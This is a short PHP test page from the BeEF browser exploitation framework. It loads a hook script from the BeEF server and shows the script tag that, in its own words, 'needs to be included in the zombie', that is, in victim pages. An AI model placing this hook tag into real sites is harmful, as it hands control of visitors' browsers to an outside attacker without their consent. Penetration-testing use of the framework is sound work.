Files
beef/hook/example.php
wade@bindshell.net 3b8add44e1 <? changed to <php and some minor changes
git-svn-id: https://beef.googlecode.com/svn/trunk@21 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
2010-04-07 11:22:37 +00:00

24 lines
631 B
PHP

<?php
require_once("../include/config.inc.php");
?>
<html>
<head>
<title>BeEF Test Page</title>
<link rel="stylesheet" type="text/css" href="../css/firefox/style.css">
<link rel="icon" href="favicon.ico" type="image/x-icon">
</head>
<body>
<img src="../images/beef.gif" alt="BeEF"/>BeEF Test Page<br><br>
<script language='Javascript' src="<?php echo BEEF_DOMAIN?>hook/beefmagic.js.php"></script>
The following code needs to be included in the zombie:<br>
<code>
&#x3C;script language='Javascript'
src="<?php echo BEEF_DOMAIN?>hook/beefmagic.js.php'&#x3E;&#x3C;/script&#x3E;
</code>
<br>
</body>
</html>